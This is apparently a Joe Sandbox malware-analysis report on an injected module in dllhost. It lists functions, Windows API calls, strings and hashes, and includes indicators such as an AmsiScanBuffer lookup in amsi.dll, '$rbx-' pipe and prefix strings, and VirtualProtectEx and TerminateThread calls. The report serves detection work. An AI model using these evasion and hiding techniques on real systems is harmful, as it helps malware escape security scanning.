Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: f28cc51ae09a7c11f906cb145423b80c79d04469284912f3f43046cda0fb0fa4
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 70315932618B418AEF51EF22A8C47A9B3B0F784F95F444169AF5E43764EF38D4C68790

Function 0000017C6DD76270 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017C6DD762AB
GetThreadContext.KERNEL32 ref: 0000017C6DD76415

Part of subcall function 0000017C6DD760A0: GetCurrentThreadId.KERNEL32 ref: 0000017C6DD760A4

Strings

\t9"1, xrefs: 0000017C6DD7627C

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID: \t9"1
API String ID: 1666949209-2818780629
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: d0314f847073577d509be4c80f26056aadbc75c6426e23c10ec85da3be25be00
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 4AD17C76208B8881DE70AB1AE49439E77B0F788B88F50055AEB8D47765DF3DC5D1CB90

Function 0000017C6DD72518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000017C6DD7252D
GetCurrentProcessId.KERNEL32 ref: 0000017C6DD72537
CreateFileW.KERNEL32 ref: 0000017C6DD72568
WriteFile.KERNEL32 ref: 0000017C6DD72590
ReadFile.KERNEL32 ref: 0000017C6DD725AF
CloseHandle.KERNEL32 ref: 0000017C6DD725B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000017C6DD72549

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: d1a7964b245bb8e1184509bbbb76e7c9bab5b2cdf7c0f23c106736facade0943
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 5A111F3561878082EB109B25F4943997770F789BD4F944319EB5E06BA8DF7CC1C5CB90

Function 0000017C6DD77C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017C6DD77C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000017C6DD77CCA
_RTC_Initialize.LIBCMT ref: 0000017C6DD77CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017C6DD77D1E
__scrt_release_startup_lock.LIBCMT ref: 0000017C6DD77D49

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: fc5f30a136f48a5442bd0f2b42363be01bcd4a5137d34d94f5ca35998a5a5c22
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4181C131B0C741A6FE50BB6698C13E962B1EB85788F5448ADBB0D47796DB38C8C587F0

Function 0000017C6DD79AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B31
GetLastError.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B3F
LoadLibraryExW.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B69
FreeLibrary.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79BD7
GetProcAddress.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79BE3

Strings

api-ms-, xrefs: 0000017C6DD79B51

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 02f9bc0bc3b9446bfb86b4985017de3f31b30b9c027b9edb852f88f7f13563f9
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0131823231AA4091EE12AB16A8C07E523B4F749BA0F99466DFF1D47794EF38D4C483A0

Function 0000017C6DD72098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000017C6DD720A6
TlsFree.KERNEL32 ref: 0000017C6DD7225F
TlsFree.KERNEL32 ref: 0000017C6DD7226B
TlsFree.KERNEL32 ref: 0000017C6DD72277
TlsFree.KERNEL32 ref: 0000017C6DD72283
TlsFree.KERNEL32 ref: 0000017C6DD7228F

Part of subcall function 0000017C6DD75E50: GetCurrentThreadId.KERNEL32 ref: 0000017C6DD75E66

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: c394335cb4c5d3176c403f97dfb6a8c60f2391a5c83877e2fb4333c893b79bc7
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 8251A031209B8595EF15FB25ECD12E823B5BB04748F840969BB2D0A7A5EF78C5D9C3E0

Function 0000017C6DD735C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000017C6DD724D1), ref: 0000017C6DD735EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000017C6DD724D1), ref: 0000017C6DD735FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017C6DD724D1), ref: 0000017C6DD73673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000017C6DD724D1), ref: 0000017C6DD736D9
HeapFree.KERNEL32(?,?,?,?,?,0000017C6DD724D1), ref: 0000017C6DD736E7

Strings

$rbx-, xrefs: 0000017C6DD7366C

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: c378ffdab85bded6d7e361fbacf73d94d03ecd43a39c50b2cc481718cd4f2b1e
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 7F318E32709B5182EF15EF16E9807A9A3B0FB44B84F084068EF5D07B55EF34C4E18790

Function 0000017C6DD81FA8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000017C6DD82027
WriteFile.KERNEL32 ref: 0000017C6DD82304
WriteFile.KERNEL32 ref: 0000017C6DD8234A
GetLastError.KERNEL32 ref: 0000017C6DD82409

Strings

\t9"1, xrefs: 0000017C6DD81FCD

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: \t9"1
API String ID: 2718003287-2818780629
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 6124af3dfeed8ef65d3a613b145d8a705f2cb490ffc3919e4477113ff062f65f
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: F8D1D432718A8489EB22DF69D4807EC3BB5F355798F40411AEF5E97B99DA34C1C6C3A0

Function 0000017C6DD7C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000017C6DD7C94F
SetLastError.KERNEL32 ref: 0000017C6DD7C96E
FlsSetValue.KERNEL32 ref: 0000017C6DD7C997
FlsSetValue.KERNEL32 ref: 0000017C6DD7C9A8
FlsSetValue.KERNEL32 ref: 0000017C6DD7C9B9

Part of subcall function 0000017C6DD7D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000017C6DD7674A), ref: 0000017C6DD7D2B6
Part of subcall function 0000017C6DD7D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000017C6DD7674A), ref: 0000017C6DD7D2C0

SetLastError.KERNEL32 ref: 0000017C6DD7C9DC

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 69478726ca235326263fd91c1b56380b2927ac65dabdfacccfa51f7b478454b6
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 1A110D3120864086FE547735A8D57FE2271AB85791F94466CFA6E663CADE38D4C183E0

Function 0000017C6DD71A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000017C6DD71A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000017C6DD71A74
PathFindFileNameW.SHLWAPI ref: 0000017C6DD71A83
lstrlenW.KERNEL32 ref: 0000017C6DD71A8F
StrCpyW.SHLWAPI ref: 0000017C6DD71AA2
CloseHandle.KERNEL32 ref: 0000017C6DD71AB0

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 6a607ebe750b771e704191617441430e1e19e9c3cad12bd659ac9cd39d87a7aa
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: AB012131708B8086EB25EB12A4947A963B1F788FC0F484139AF5E43754DE3CC5C6C790

Function 0000017C6DD73E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000017C6DD73AAC), ref: 0000017C6DD73EAE

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 60b933eac39f18cdee9f3844cea064595c7aa5db7395e3fffccd533750393632
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: A501407521978082FF25AB61F8887A573B4BB45B45F04012CEB4E06368EF3DC4C8C7A0

Function 0000017C6DD78090 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000017C6DD780BC
GetCurrentThreadId.KERNEL32 ref: 0000017C6DD780CA
GetCurrentProcessId.KERNEL32 ref: 0000017C6DD780D6
QueryPerformanceCounter.KERNEL32 ref: 0000017C6DD780E6

Strings

\t9"1, xrefs: 0000017C6DD7809D

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID: \t9"1
API String ID: 2933794660-2818780629
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: a718307440a95d6010f077f46a0e49642c078825958fd384491dda412827368b
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 34110636754B048AEF009B61E8943A833B4F719B58F440A29EB6D867A4DB78C1E48390

Function 0000017C6DD71AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000017C6DD71AF4
StrCmpNIW.SHLWAPI ref: 0000017C6DD71B0E
lstrlenW.KERNEL32 ref: 0000017C6DD71B1D
StrCpyW.SHLWAPI ref: 0000017C6DD71B32

Strings

\\?\, xrefs: 0000017C6DD71B02

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 3e6adfbafb3e94503521bda1f9878d6557a2520877a3e5dc5897f1df9e9968b8
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 14F04F7230868592EF20AB25F9D43E96371F745B88FC45129EB4E46A58DE6CC6C8CB60

Function 0000017C6DD73708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000017C6DD7275A), ref: 0000017C6DD7372A
StrCpyW.SHLWAPI ref: 0000017C6DD7373A
StrCatW.SHLWAPI ref: 0000017C6DD73746
PathCombineW.SHLWAPI(?,?,00000000,0000017C6DD7275A), ref: 0000017C6DD73754

Strings

\\.\pipe\, xrefs: 0000017C6DD73720

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 9ece0c00a92c3609b29d3100eba85d3ef457418991b2c8149778dd4f70a001fe
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: A2F08C74308B8082EE05AB13B9941A9A270BB48FC1F488538FF1F07B18CF2CC4C687A0

Function 0000017C6DD7B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000017C6DD7B929
GetProcAddress.KERNEL32 ref: 0000017C6DD7B93F
FreeLibrary.KERNEL32 ref: 0000017C6DD7B95B

Strings

mscoree.dll, xrefs: 0000017C6DD7B920
CorExitProcess, xrefs: 0000017C6DD7B938

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: e1becc59d16ac5c9d6150d52f218d3f75485e216c7cae85a8c03312afa0e04ee
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: F4F0903121864181EE11AB24E8D57E96330EB89760F54021DEB7E457E4CF2CC4C8C3E0

Function 0000017C6DD71E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000017C6DD71E47
GetProcAddress.KERNEL32 ref: 0000017C6DD71E57
Sleep.KERNEL32 ref: 0000017C6DD71E67

Strings

amsi.dll, xrefs: 0000017C6DD71E40
AmsiScanBuffer, xrefs: 0000017C6DD71E50

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 7295b84dca63e21db4aa618676707eec946b595ce12f8f6f9432ecc59e35a3d8
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
